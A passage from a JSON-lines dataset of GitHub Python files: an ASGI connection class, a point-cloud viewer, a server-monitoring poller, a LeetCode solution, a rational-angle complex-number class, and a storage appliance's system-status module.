= message.get(\"more_body\", False) or False\n self.http_received_body_length += len(chunk)\n yield chunk\n\n async def body(self):\n return b\"\".join([chunks async for chunks in self.body_iter()])\n\n async def handle_message(self, message):\n if message.get(\"type\") == \"http.disconnect\":\n raise HTTPRequestError(\"Disconnected\")\n\n def put_resp_header(self, key, value):\n self.resp_headers.add(key, value)\n return self\n\n def put_resp_cookie(self, key, value, **params):\n self.resp_cookies[key] = value\n for k, v in params.items():\n self.resp_cookies[key][k] = v\n return self\n\n async def send_resp(\n self,\n body: bytes,\n status: Optional[Union[int, HTTPStatus]] = None,\n halt: bool = False,\n ):\n if self.halted:\n raise HTTPStateError(\"Connection already halted\")\n if self.started and status and status != self.status:\n raise HTTPStateError(\"Cannot change status code after response started\")\n if not self.started:\n if status:\n self.status = status\n if halt:\n self.put_resp_header(\"content-length\", str(len(body)))\n await self.start_resp()\n await self.send(\n {\"type\": \"http.response.body\", \"body\": body or b\"\", \"more_body\": True}\n )\n if halt:\n await self.halt()\n return self\n\n async def start_resp(self):\n self.status = self.status or 200\n if isinstance(self.status, HTTPStatus):\n self.status = self.status.value\n headers = [\n [k.encode(\"ascii\"), v.encode(\"ascii\")] for k, v in self.resp_headers.items()\n ]\n for value in self.resp_cookies.values():\n headers.append([b\"Set-Cookie\", value.OutputString().encode(\"ascii\")])\n await self.send(\n {\"type\": \"http.response.start\", \"status\": self.status, \"headers\": headers}\n )\n return self\n\n async def halt(self):\n if self.halted:\n raise HTTPStateError(\"Conn already halted\")\n if not self.started:\n self.status = 204\n await self.start_resp()\n await self.send({\"type\": \"http.response.body\", \"body\": b\"\", \"more_body\": False})\n return self\n\n async def redirect(self, location, code=None, body=b\"\"):\n if self.started:\n raise HTTPStateError(\"http response already started\")\n self.put_resp_header(\"location\", location)\n self.status = code or 302\n await self.send_resp(body, halt=True)\n return self\n\n async def call_asgi_app(self, asgi_app, interface=None):\n interface = interface or self.interface\n if interface == Conn.ASGI2:\n await asgi_app(self.scope)(self.receive, self.send)\n elif interface == Conn.ASGI3:\n await asgi_app(self.scope, self.receive, self.send)\n return self\n\n def register_after_send(self, callback):\n self._after_send.append(callback)\n\n def register_after_start(self, callback):\n self._after_start.append(callback)\n\n def __getattr__(self, name):\n try:\n return itemgetter(name)(self.private)\n except KeyError:\n return None\n\n\nclass WSState(Enum):\n init = \"init\"\n connecting = \"connecting\"\n open = \"open\"\n closing = \"closing\"\n closed = \"closed\"\n\n\nclass ConnWithWS(Conn):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.ws_state: WSState = WSState.init\n self.closing_code: Optional[int] = None\n\n async def ws_close(self, code: int = 1000):\n await self.send({\"type\": \"websocket.close\", \"code\": code})\n self.ws_state = WSState.closing\n self.closing_code = code\n\n async def ws_accept(self, subprotocol: Optional[str] = None):\n if self.ws_state == WSState.init:\n await self.ws_receive()\n if self.ws_state != WSState.connecting:\n raise HTTPStateError(\n f\"Accepting websocket connection in state: {self.ws_state}. Exepcting {WSState.connecting}\"\n )\n await self.send(\n {\n \"type\": \"websocket.accept\",\n \"subprotocol\": subprotocol,\n \"headers\": [\n [k.encode(\"ascii\"), v.encode(\"ascii\")]\n for k, v in self.resp_headers.items()\n ],\n }\n )\n self.ws_state = WSState.open\n\n async def ws_receive(self):\n if self.ws_state == WSState.closed:\n raise HTTPStateError(\"Receiving on closed ws connection\")\n message = await super().receive()\n if self.ws_state == WSState.init:\n if message[\"type\"] != \"websocket.connect\":\n raise HTTPStateError(\n f\"Expecting websocket.connect message, but got {message['type']}\"\n )\n self.ws_state = WSState.connecting\n return self.ws_state\n if message[\"type\"] == \"websocket.disconnect\":\n self.ws_state = WSState.closed\n self.closing_code = message[\"code\"]\n return self.ws_state\n # messages should be of type websocket.receive now\n if 'bytes' in message and message['bytes'] is not None:\n return message['bytes']\n return message['text']\n\n async def ws_iter_messages(self):\n if self.ws_state != WSState.open:\n raise HTTPStateError(\n f\"Cannot iter messages when connection is not open. Current state: {self.ws_state}\"\n )\n while True:\n message = await self.ws_receive()\n if self.ws_state in [WSState.closed, WSState.closing]:\n break\n yield message\n\n\n async def ws_send(self, text_or_byte: Union[str, ByteString]):\n if self.ws_state != WSState.open:\n raise HTTPStateError(\n f\"Cannot send messages when connection is not open. Current state: {self.ws_state}\"\n )\n if isinstance(text_or_byte, ByteString):\n await self.send({\"type\": \"websocket.send\", \"bytes\": text_or_byte})\n else:\n await self.send({\"type\": \"websocket.send\", \"text\": text_or_byte})\n","repo_name":"ericls/PythonPlug","sub_path":"PythonPlug/conn.py","file_name":"conn.py","file_ext":"py","file_size_in_byte":11032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"8811305410","text":"import itertools\n\nimport moderngl_window as mglw\nimport numpy as np\n\nfrom render.colors import z_color, d1_color\nfrom render.utils import read_pc\nfrom render.renderers import InteractiveRenderer\nfrom render.camera import FreeViewpointCamera\nfrom render.text import TextRenderer, render_multiline_text\n\nLSHIFT = 65505\n\n\nclass CameraController:\n def __init__(self):\n self.move_speed = 2\n self.rotate_speed = 0.005\n self.forward = 0\n self.side = 0\n self.up = 0\n self.roll = 0\n\n def on_render(self, camera, frametime):\n if self.forward != 0:\n delta = self.forward * frametime * self.move_speed\n camera.move_forward(delta)\n if self.side != 0:\n delta = self.side * frametime * self.move_speed\n camera.move_side(delta)\n if self.up != 0:\n delta = self.up * frametime * self.move_speed\n camera.move_up(delta)\n if self.roll != 0:\n delta = self.roll * frametime * self.move_speed\n camera.rotate_view(delta, 0, 0)\n\n def key_event(self, wnd, key, action, modifiers):\n if action == wnd.keys.ACTION_PRESS:\n if key == wnd.keys.Z or key == wnd.keys.W:\n self.forward = 1\n if key == wnd.keys.S:\n self.forward = -1\n if key == wnd.keys.D:\n self.side = 1\n if key == wnd.keys.Q or key == wnd.keys.A:\n self.side = -1\n if key == wnd.keys.SPACE:\n self.up = 1\n if key == LSHIFT:\n self.up = -1\n if key == wnd.keys.E:\n self.roll = 1\n if key == wnd.keys.R:\n self.roll = -1\n # Key releases\n elif action == wnd.keys.ACTION_RELEASE:\n if key == wnd.keys.Z or key == wnd.keys.W or key == wnd.keys.S:\n self.forward = 0\n if key == wnd.keys.D or key == wnd.keys.Q or key == wnd.keys.A:\n self.side = 0\n if key == wnd.keys.SPACE or key == LSHIFT:\n self.up = 0\n if key == wnd.keys.R or key == wnd.keys.E:\n self.roll = 0\n\n def mouse_drag_event(self, camera, x, y, dx, dy):\n camera.rotate_view(0, dx * self.rotate_speed, dy * self.rotate_speed)\n\n\nclass InteractiveWindow(mglw.WindowConfig):\n gl_version = (3, 3)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.ctx.enable_only(self.ctx.DEPTH_TEST)\n input_paths = self.argv.input_paths\n self.wnd.title = ', '.join(input_paths)\n\n self.data = []\n for input_path in input_paths:\n xyz, attrs = read_pc(input_path)\n self.data.append({'path': input_path, 'xyz': xyz, 'attrs': attrs, 'cube_size': 1})\n\n self.build_colors()\n\n for pc in self.data:\n pc['renderer'] = InteractiveRenderer(self.ctx, pc['xyz'], pc['colors'][self.sel_color])\n\n self.camera = FreeViewpointCamera(self.data[0]['xyz'], self.wnd.aspect_ratio / len(self.data))\n self.camera_controller = CameraController()\n self.text_renderer_vp = TextRenderer(self.ctx, self.wnd.width // len(self.data), self.wnd.height)\n self.text_renderer = TextRenderer(self.ctx, self.wnd.width, self.wnd.height)\n self.display_help = False\n self.selected_pc = 0\n\n def build_colors(self):\n zmin, zmax = np.mean([np.quantile(pc['xyz'][:, 2], [0.01, 0.99]) for pc in self.data], axis=0)\n for pc in self.data:\n colors = {}\n xyz = pc['xyz']\n attrs = pc['attrs']\n if 'rgb' in attrs:\n rgb = attrs['rgb']\n colors['rgb'] = rgb\n z_rgb = z_color(xyz, zmin, zmax)\n colors['z'] = z_rgb\n pc['colors'] = colors\n\n if len(self.data) == 2:\n colors1, colors2 = d1_color(self.data[0]['xyz'], self.data[1]['xyz'])\n self.data[0]['colors']['D1'] = colors1\n self.data[1]['colors']['D1'] = colors2\n\n colorset = set.intersection(*[set(x['colors'].keys()) for x in self.data])\n self.sel_color = 'rgb' if 'rgb' in colorset else 'z'\n self.avail_colors = itertools.cycle(colorset)\n\n def render(self, time, frametime):\n self.camera_controller.on_render(self.camera, frametime)\n self.ctx.clear(0.0, 0.0, 0.0, 0.0)\n\n n_viewports = len(self.data)\n w = self.wnd.width // n_viewports\n for vp in range(n_viewports):\n self.ctx.viewport = (w * vp, 0, w, self.wnd.height)\n cur_data = self.data[vp]\n cur_data['renderer'](self.camera)\n text = [self.data[vp]['path'], f'Cube size: {cur_data[\"cube_size\"]}']\n if self.selected_pc == vp:\n text.insert(0, 'Selected')\n render_multiline_text(self.text_renderer_vp, text, 20, 20, 1)\n\n self.ctx.viewport = (0, 0, self.wnd.width, self.wnd.height)\n render_multiline_text(self.text_renderer, [f'Color: {self.sel_color}', 'Press h for help'],\n 20, self.wnd.height - 30, -1)\n if self.display_help:\n render_multiline_text(self.text_renderer, ['ZQSD/WASD: move', 'ER: roll', 'Mouse drag: rotate',\n 'Space/LSHIFT: rise/fall', 'V/B: Change cube size'],\n 20, self.wnd.height - 120, -1)\n\n def resize(self, width: int, height: int):\n n_viewports = len(self.data)\n self.camera.aspect_ratio = width / (height * n_viewports)\n self.text_renderer_vp.set_resolution(width // n_viewports, height)\n self.text_renderer.set_resolution(width, height)\n\n def key_event(self, key, action, modifiers):\n self.camera_controller.key_event(self.wnd, key, action, modifiers)\n if action == self.wnd.keys.ACTION_PRESS:\n if key == self.wnd.keys.H:\n self.display_help = not self.display_help\n n_viewports = len(self.data)\n if key == self.wnd.keys.B:\n cur_data = self.data[self.selected_pc]\n cur_data['cube_size'] += 1\n cur_data['renderer'].set_cube_size(cur_data['cube_size'])\n if key == self.wnd.keys.V:\n cur_data = self.data[self.selected_pc]\n cur_data['cube_size'] = max(1, cur_data['cube_size'] - 1)\n cur_data['renderer'].set_cube_size(cur_data['cube_size'])\n if key == self.wnd.keys.C:\n self.sel_color = next(self.avail_colors)\n for vp in range(n_viewports):\n self.data[vp]['renderer'].set_rgb(self.data[vp]['colors'][self.sel_color])\n if key == self.wnd.keys.N:\n self.selected_pc = (self.selected_pc + 1) % len(self.data)\n\n def mouse_drag_event(self, x, y, dx, dy):\n self.camera_controller.mouse_drag_event(self.camera, x, y, dx, dy)\n\n @classmethod\n def add_arguments(cls, parser):\n parser.add_argument('input_paths', type=str, nargs='+')\n\n\nif __name__ == '__main__':\n InteractiveWindow.run()\n","repo_name":"mauriceqch/2023_BASICS_PC_toolbox","sub_path":"src/display_pc.py","file_name":"display_pc.py","file_ext":"py","file_size_in_byte":7131,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"33403422769","text":"import os\nimport psutil\nimport time\nimport requests\nimport json\nimport socket\nfrom requests.exceptions import HTTPError\n\nname = \"loadbalancer\"\nused = 0\nfree = 0\nuptime_minutes = 0\ncpu = 0\ntimestamp = int(time.time())\n\nservers = [\"http://192.168.1.2:80/data.json\",\"http://192.168.1.3:80/data.json\",\"http://192.168.2.3:80/data.json\",\"http://192.168.2.4:80/data.json\"]\n\ndef disk_usage(path):\n global used\n global free\n st = os.statvfs(path)\n free = st.f_bavail * st.f_frsize / 1000000000\n used = (st.f_blocks - st.f_bfree) * st.f_frsize / 1000000000\n\ndef uptime():\n global uptime_minutes\n with open('/proc/uptime', 'r') as f:\n uptime_seconds = float(f.readline().split()[0])\n uptime_minutes = round(uptime_seconds/60, 2)\n\nwhile True:\n i = 0\n data = []\n\n cpu = psutil.cpu_percent(interval=1)\n disk_usage(\"/\")\n uptime()\n timestamp = int(time.time())\n\n thisdata = {\n \"timestamp\": timestamp,\n \"uptime\": uptime_minutes,\n \"disk_used\": used,\n \"disk_free\": free,\n \"cpu\": cpu,\n \"name\": name\n }\n\n for url in servers:\n try:\n r = requests.get(url, timeout=0.2)\n\n # If the response was successful, no Exception will be raised\n r.raise_for_status()\n\n sData = json.loads(r.content)\n data.append(sData)\n except HTTPError:\n print('F')\n continue\n except Exception as err:\n print('F')\n print(err)\n continue\n else:\n print('Success!')\n\n data.append(thisdata)\n print (data)\n\n with open('/var/www/html/data.json', 'w') as outfile:\n json.dump(data, outfile)\n\n time.sleep(1)\n","repo_name":"GuusApeldoorn/NerdyGadgets","sub_path":"requestData.py","file_name":"requestData.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75152253209","text":"class Solution1768:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n l1 = len(word1)\n l2 = len(word2)\n idx1 = 0\n idx2 = 0\n res = \"\"\n while idx1 < l1 or idx2 < l2:\n if idx1 < l1:\n res += word1[idx1]\n idx1 += 1\n if idx2 < l2:\n res += word2[idx2]\n idx2 += 1\n return res\n","repo_name":"genius52/leetcode","sub_path":"src/python/stringissue/Solution1768.py","file_name":"Solution1768.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26367149415","text":"from .Q import *\n\nclass InvalidBasisValueError(ValueError):\n def __init__(self):\n super(\"you must specify an 'a' parameter\")\n\nclass M_a():\n \"\"\"\n A system of numbers that correspond to vectors in the complex plane that are Q\n multiples of Q unit vectors, where a Q unit vector is a unit vector whose\n argument is 2pi/(p+a) for some Q values of r, k, p and a.\n\n r.e^{2\\pi{i}\\frac{k}{p+a}} = r.M_a(p)^k\n\n It can be shown that M_a(p).M_a(q) = M_a(0) for all iff p and q are complementary factors of a^2.\n\n In particular, for a=2, then M_2(0) = -1.\n\n That this means is that for all p in {1,2,4}\n\n M_2(p).M_2(4/p) = M_2(0) = -1\n\n which happens to mirror a analogous relationship in the integer domain:\n\n 1/(p+2) + 1/(4/p+2) = 1/2\n\n In otherwords the same values of p such that a convex polygon of p+2 sides can successfully\n tessellate the plane.\n\n In sense, where p={1,2,4} are factors of 4 in the integer domain. M_2(p), M_2(q) are factors of M_2(0)\n in the complex plane.\n \"\"\"\n\n def check_a(a):\n if a is None:\n raise InvalidBasisValueError()\n\n def __init__(self, p, a, k=1, r=1):\n try:\n a = Q.lift(a)\n r = Q.lift(r)\n p = Q.lift(p)\n k = Q.lift(k)\n\n kn=k/(p+a)\n a=Q.lift(a.p)\n p=Q.lift(kn.q)-a\n k=Q.lift(kn.p)\n\n if p.q != 1:\n k=k*p.q\n p=Q.lift(p.p)+a*(p.q-1)\n\n if k.q != 1:\n p=p*k.q+a*(k.q-1)\n k=Q.lift(k.p)\n\n if p+a < 0:\n k=k*-1\n p=(p+a)*-1-a\n\n if p.p+a.p != 0:\n k = Q.lift(k.p % (p.p+a.p))\n\n if k.p == 0:\n p.p = 0\n\n self.a=a\n self.r=r\n self.p=p\n self.k=k\n except ZeroDivisionError as e:\n print(\"div by zerp\", k,p,a,r)\n raise e\n\n def from_ratio(pq, a=None):\n M_a.check_a(a)\n a = Q.lift(a)\n pq = Q.lift(pq)\n p=(Q_1-pq*a)/pq\n\n return M_a(p=p, a=a)\n\n def lift(p, a=None, k=1, r=1):\n \"\"\"lifts a number of another kind into an M_a\"\"\"\n if isinstance(p, M_a):\n if a and a != p.a:\n return M_a(p=p.p+p.a-a,a=a,k=p.k*k,r=p.r*r)\n return p\n else:\n M_a.check_a(a)\n if isinstance(p, Q):\n return M_a(p, a, k=k, r=r)\n elif isinstance(p, int) or isinstance(p, float):\n return M_a(Q.lift(p), a, k=k, r=1)\n elif isinstance(p, complex):\n a = Q.lift(a)\n r, phi = cmath.polar(p)\n phi = math.fmod(phi+math.pi*2, math.pi*2)\n n=Q.lift((2*math.pi)/phi, max_depth=2)\n p=Q.lift(n.p)-a\n k=Q.lift(n.q)\n return M_a(p, a, k=k, r=r)\n else:\n raise ValueError(f\"{p} cannot be lifted to an M_a\")\n\n def conjugate(self):\n \"\"\"creates an object that represents the conjugate of the receiver\"\"\"\n return M_a(p=self.p, a=self.a, k=self.k*-1, r=self.r)\n\n def complex(self, precision=Q.PRECISION):\n \"\"\"creates a complex number that approximates the receiver\"\"\"\n kn=self.k_n().float()\n c=cmath.rect(self.r.float(), 2*math.pi*kn)\n if precision:\n c = complex(round(c.real, precision), round(c.imag, precision))\n return c\n\n def ratio(self):\n return self.k/(self.p+self.a)\n\n def __str__(self):\n k=f\"{self.k}\"\n if self.k.q > 1:\n k=f\"({k})\"\n frac=f\"{self.k}/({self.p}+{self.a})\"\n if not self.r == 1:\n frac=f\"{frac}x{self.r}\"\n if not self.a == 2:\n frac=f\"{frac}@{self.a}\"\n return f\"{frac}\"\n\n def __repr__(self):\n return f\"(a,r,p,k)={(self.a, self.r, self.p, self.k)}={str(self)}={self.complex()}\"\n\n def latex(self, use_negative=True):\n k=self.k\n if use_negative:\n n=self.a+self.p\n if k*2 > n:\n k=(k-n)\n out=f\"e^{{2\\\\pi\\\\frac{{{k}}}{{{self.p}+{self.a}}}{{i}}}}\"\n if not self.r == 1:\n out =f\"{self.r}{out}\"\n return f\"${out}$\"\n\n def latex_symbolic(self, use_negative=True):\n k=self.k\n if use_negative:\n n=self.a+self.p\n if k*2 > n:\n k=(k-n)\n out=f\"M_{{{self.a}}}({self.p})^{{{k}}}\"\n if not self.r == 1:\n out =f\"{self.r}{out}\"\n return f\"${out}$\"\n\n def k_n(self):\n return self.k/(self.p+self.a)\n\n def __eq__(self, pq):\n pq=M_a.lift(pq)\n return self.k_n() == pq.k_n()\n\n def __hash__(self):\n kn=self.k_n()\n return kn.p^kn.q\n\n def __lt__(self, pq):\n pq=M_a.lift(pq)\n return self.k_n() < pq.k_n()\n\n def __mul__(self, q):\n q=M_a.lift(q)\n r=self.r*q.r\n kn=self.k_n()+q.k_n()\n k=kn.p\n p=Q.lift(kn.q)-self.a\n return M_a(p=p, k=k, a=self.a, r=r)\n\n def __pow__(self, pow):\n pow = Q.lift(pow)\n k = self.k*pow\n return M_a(a=self.a, p=self.p, k=k, r=self.r)\n","repo_name":"wildducktheories/curious-factors","sub_path":"src/M_a.py","file_name":"M_a.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36632127548","text":"#!/usr/bin/env python2.6\n# -*- coding: utf-8 -*-\n\nimport json\nimport re\nimport time\nimport os\nimport commands\n\nfrom libcommon import *\n\nERROR_VALUE = 'error-occurs'\nVER_SEP = ':'\nNCT_ROOT = '/sys/devices/platform/nct6106.656'\nNCT_LINK = '/opt/jw-conf/system'\n\ndef __get_cpu_info(mod):\n\t_item = {}\n\t_item['item'] = mod\n\ttry:\n\t\t_item['value'] = re.findall('model name\\t: (.*)', read_file('/proc/cpuinfo'))[0]\n\texcept:\n\t\t_item['value'] = ERROR_VALUE\n\treturn _item\n\nCPU_UTIL_DIR = '/var/run/cpu_util'\ndef __get_cpu_util(mod):\n\t_item = {}\n\t_item['item'] = mod\n\n\ttry:\n\t\t_cpu_stat = re.findall('cpu (.*)', read_file('/proc/stat'))[0].split()\n\t\t_user = int(_cpu_stat[0])\n\t\t_nice = int(_cpu_stat[1])\n\t\t_system = int(_cpu_stat[2])\n\t\t_idle = int(_cpu_stat[3])\n\t\t_iowait = int(_cpu_stat[4])\n\t\t_irq = int(_cpu_stat[5])\n\t\t_softirq = int(_cpu_stat[6])\n\t\t_total = _user + _nice + _system + _idle + _iowait + _irq + _softirq\n\t\t\n\t\t_last_total = 0\n\t\t_last_idle = 0\n\t\tif not os.path.isdir(CPU_UTIL_DIR):\n\t\t\tos.mkdir(CPU_UTIL_DIR)\n\t\t\tfs_attr_write(CPU_UTIL_DIR + '/total', '0')\n\t\t\tfs_attr_write(CPU_UTIL_DIR + '/idle', '0')\n\t\telse:\n\t\t\tval = fs_attr_read(CPU_UTIL_DIR + '/total')\n\t\t\tif val.isdigit():\n\t\t\t\t_last_total = int(val)\n\t\t\tval = fs_attr_read(CPU_UTIL_DIR + '/idle')\n\t\t\tif val.isdigit():\n\t\t\t\t_last_idle = int(val)\n\t\t\t\n\t\t\tfs_attr_write(CPU_UTIL_DIR + '/total', str(_total))\n\t\t\tfs_attr_write(CPU_UTIL_DIR + '/idle', str(_idle))\n\t\t\n\t\t_cpu_ratio = 100 - 100 * float(_idle - _last_idle) / (_total - _last_total)\n\t\t_item['value'] = '%.1f%%' % _cpu_ratio\n\texcept:\n\t\t_item['value'] = ERROR_VALUE\n\treturn _item\n\ndef __read_value(path, fil):\n\tcontent = ''\n\ttry:\n\t\tf = open('%s/%s' % (path, fil))\n\t\tcontent = f.readline()\n\t\tf.close\n\texcept:\n\t\tpass\n\treturn content.strip()\n\ndef __get_temp(mod):\n\t_item = {}\n\t_item['item'] = mod\n\ttry:\n\t\t_item['value'] = ''\n\t\ttemp = __read_value(NCT_LINK, 'temp_cpu')\n\t\tif temp != '':\n\t\t\t_item['value'] = _item['value'] + '[ CPU温度: %d ]' % (int(temp)/1000)\n\t\ttemp = __read_value(NCT_ROOT, 'temp18_input')\n\t\tif temp != '':\n\t\t\t_item['value'] = _item['value'] + ' [ 机箱温度: %d ]' % (int(temp)/1000)\n\t\t#temp = __read_value(NCT_ROOT, 'temp20_input')\n\t\t#if temp != '':\n\t\t#\t_item['value'] = _item['value'] + ' [ 环境温度: %d ]' % (int(temp)/1000)\n\texcept:\n\t\t_item['value'] = ERROR_VALUE\n\treturn _item\n\ndef __get_fan_speed(mod):\n\t_item = {}\n\t_item['item'] = mod\n\ttry:\n\t\t_item['value'] = ''\n\t\ttemp = __read_value(NCT_ROOT, 'fan1_input')\n\t\tif temp != '' and temp != 'good':\n\t\t\t_item['value'] = _item['value'] + '[ 机箱风扇1: %s RPM ]' % temp\n\t\ttemp = __read_value(NCT_ROOT, 'fan3_input')\n\t\tif temp != '' and temp != 'good':\n\t\t\t_item['value'] = _item['value'] + ' [ 机箱风扇2: %s RPM ]' % temp\n\t\t#temp = __read_value(NCT_ROOT, 'fan2_input')\n\t\t#if temp != '' and temp != 'good':\n\t\t#\t_item['value'] = _item['value'] + ' [ CPU风扇: %s RPM ]' % temp\n\texcept:\n\t\t_item['value'] = ERROR_VALUE\n\treturn _item\n\ndef __calc_mem(mem_kb):\n\t# check kb\n\t_tmp1 = mem_kb / 1000\n\tif _tmp1 < 1.0:\n\t\treturn '%d KB' % int(round(mem_kb))\n\t_tmp2 = _tmp1 / 1000\n\tif _tmp2 < 1.0:\n\t\treturn '%d MB' % int(round(_tmp1))\n\t_tmp1 = _tmp2 / 1000\n\tif _tmp1 < 1.0:\n\t\treturn '%d GB' % int(round(_tmp2))\n\t_tmp2 = _tmp1 / 1000\n\tif _tmp2 < 1.0:\n\t\treturn '%d TB' % int(round(_tmp1))\n\treturn ''\n\ndef __get_mem_util(mod):\n\t_item = {}\n\t_item['item'] = mod\n\ttry:\n\t\tmem_info = read_file('/proc/meminfo')\n\t\tmem_total = float(re.findall('MemTotal: (.*) kB', mem_info)[0])\n\t\tmem_free = float(re.findall('MemFree: (.*) kB', mem_info)[0])\n\t\tmem_used = mem_total - mem_free\n\t\t_item['value'] = '%.2f%% [ 总内存 %s ]' % (mem_used/mem_total*100, __calc_mem(mem_total))\n\texcept:\n\t\t_item['value'] = ERROR_VALUE\n\treturn _item\n\ndef __get_runtime(mod):\n\t_item = {}\n\t_item['item'] = mod\n\ttry:\n\t\trun_secs = int(float(re.findall('(.*) ', read_file('/proc/uptime'))[0]))\n\t\t_run_days = int(run_secs / 86400)\n\t\t_run_hours = int((run_secs - _run_days*86400) / 3600)\n\t\t_run_mins = int((run_secs - _run_days*86400 - _run_hours*3600) / 60)\n\t\t_run_secs = int(run_secs - _run_days*86400 - _run_hours*3600 - _run_mins*60)\n\t\t_item['value'] = ''\n\t\tif _run_days != 0:\n\t\t\t_item['value'] = _item['value'] + '%d天' % _run_days\n\t\tif _run_hours != 0:\n\t\t\t_item['value'] = _item['value'] + '%d小时' % _run_hours\n\t\tif _run_mins != 0:\n\t\t\t_item['value'] = _item['value'] + '%d分钟' % _run_mins\n\t\tif _run_secs != 0:\n\t\t\t_item['value'] = _item['value'] + '%d秒' % _run_secs\n\texcept:\n\t\t_item['value'] = ERROR_VALUE\n\treturn _item\n\ndef __get_lastrun(mod):\n\t_item = {}\n\t_item['item'] = mod\n\ttry:\n\t\trun_secs = float(re.findall('(.*) ', read_file('/proc/uptime'))[0])\n\t\t_item['value'] = time.ctime(time.time() - run_secs)\n\texcept:\n\t\t_item['value'] = ERROR_VALUE\n\treturn _item\n\n# 单片机版本\ndef __mcu_ver():\n\ttry:\n\t\tret,msg = commands.getstatusoutput('/usr/local/bin/pic-version')\n\t\tif 0 == ret:\n\t\t\treturn msg\n\texcept:\n\t\tpass\n\treturn 'nopic'\n\n# 内核版本\ndef __kernel_ver():\n\timport platform\n\treturn platform.uname()[2] + '-' + platform.machine()\n\n# rootfs版本\ndef __rootfs_ver():\n\treturn '1.0'\n\n# 存储软件版本\ndef __apps_ver():\n\ttry:\n\t\tret,msg = commands.getstatusoutput('sys-manager version')\n\t\tif 0 == ret:\n\t\t\treturn msg.split(':')[1].strip()\n\texcept:\n\t\tpass\n\treturn 'apps'\n\n# web版本\ndef __web_ver():\n\ttry:\n\t\tret,msg = commands.getstatusoutput('cat /var/www/version')\n\t\tif 0 == ret:\n\t\t\treturn msg\n\texcept:\n\t\tpass\n\treturn 'noweb'\n\n# 编译日期\ndef __build_date():\n\ttry:\n\t\tret,msg = commands.getstatusoutput('sys-manager version -d')\n\t\tif 0 == ret:\n\t\t\treturn msg.split('\\n')[-1]\n\texcept:\n\t\tpass\n\treturn ''\n\ndef __get_sys_version():\n\treturn __apps_ver() + VER_SEP + __kernel_ver() + VER_SEP + __mcu_ver() + VER_SEP + __web_ver() + ' ' + __build_date()\n\ndef __get_version(mod):\n\t_item = {}\n\t_item['item'] = mod\n\t_item['value'] = __get_sys_version()\n\treturn _item\n\n_info_list = {'cpu-info':__get_cpu_info,\n\t\t'cpu-util': __get_cpu_util,\n\t\t'temp': __get_temp,\n\t\t'fan-speed': __get_fan_speed,\n\t\t'mem-util': __get_mem_util,\n\t\t'runtime': __get_runtime,\n\t\t'last-run': __get_lastrun,\n\t\t'version': __get_version}\n\ndef get_info_item():\n\treturn str(_info_list.keys())\n\ndef get_sys_info(item=None):\n\tglobal _info_list\n\t_info_rows = []\n\ttry:\n\t\tfor mod,func in _info_list.items():\n\t\t\tif not item:\n\t\t\t\t_info_rows.append(func(mod))\n\t\t\telif item == mod:\n\t\t\t\t_info_rows.append(func(mod))\n\t\t\t\tbreak\n\texcept:\n\t\tpass\n\treturn _info_rows\n\n#------------------------------------------------------------------------------\n\nALARM_DIR='/var/run/sys-mon/alarm'\n\ndef AttrRead(dir_path, attr_name):\n\tvalue = ''\n\tfull_path = dir_path + os.sep + attr_name\n\ttry:\n\t\tf = open(full_path)\n\t\tvalue = f.readline()\n\texcept:\n\t\treturn value\n\telse:\n\t\tf.close()\n\treturn value.strip()\n\n\"\"\"\n获取状态函数返回值约定:\n1. 状态正常返回 'good'\n2. 状态异常返回异常原因字符串\n\"\"\"\n\ndef __get_stat_disk(mod):\n\t_stat = {}\n\t_stat['item'] = mod\n\t_stat['value'] = ''\n\n\t# 通过外部命令获取状态\n\ttry:\n\t\t_disk_list = json.loads(commands.getoutput('sys-manager disk --list'))\n\t\tfor _disk in _disk_list['rows']:\n\t\t\tif _disk['state'] == 'Fail':\n\t\t\t\t_stat['value'] = _stat['value'] + '槽位号%s的磁盘故障 ' % str(_disk['slot'])\n\texcept:\n\t\tpass\n\t\t_stat['value'] = '无法获取'\n\tif _stat['value'] == '':\n\t\t_stat['value'] = 'good'\n\treturn _stat\n\ndef __get_stat_vg(mod):\n\t_stat = {}\n\t_stat['item'] = mod\n\t_stat['value'] = ''\n\n\t# 通过外部命令获取\n\ttry:\n\t\t_vg_list = json.loads(commands.getoutput('sys-manager vg --list'))\n\t\tfor _vg in _vg_list['rows']:\n\t\t\tif _vg['raid_state'] == 'fail':\n\t\t\t\t_stat['value'] = _stat['value'] + '卷组%s失效 ' % str(_vg['name'])\n\t\t\telif _vg['raid_state'] == 'degrade':\n\t\t\t\t_stat['value'] = _stat['value'] + '卷组%s降级 ' % str(_vg['name'])\n\t\t\telif _vg['raid_state'] == 'rebuild':\n\t\t\t\t_stat['value'] = _stat['value'] + '卷组%s重建 ' % str(_vg['name'])\n\texcept:\n\t\tpass\n\t\t_stat['value'] = '无法获取'\n\tif _stat['value'] == '':\n\t\t_stat['value'] = 'good'\n\treturn _stat\n\ndef __get_stat_power(mod):\n\t_stat = {}\n\t_stat['item'] = mod\n\t_val = AttrRead(ALARM_DIR, 'power')\n\tif _val != '' and _val != 'good':\n\t\t_stat['value'] = _val\n\telse:\n\t\t_stat['value'] = 'good'\n\treturn _stat\n\ndef __get_stat_fan(mod):\n\t_stat = {}\n\t_stat['item'] = mod\n\t_tmp = AttrRead(ALARM_DIR, 'case-fan1')\n\t_value = ''\n\tif _tmp != '' and _tmp != 'good':\n\t\t_value = _value + '[机箱风扇1告警: %s] ' % _tmp\n\t_tmp = AttrRead(ALARM_DIR, 'case-fan2')\n\tif _tmp != '' and _tmp != 'good':\n\t\t_value = _value + '[机箱风扇2告警: %s] ' % _tmp\n\t#_tmp = AttrRead(ALARM_DIR, 'cpu-fan')\n\t#if _tmp != '' and _tmp != 'good':\n\t#\t_value = _value + '[CPU风扇告警: %s]' % _tmp\n\tif _value != '':\n\t\t_stat['value'] = _value\n\telse:\n\t\t_stat['value'] = 'good'\n\treturn _stat\n\ndef 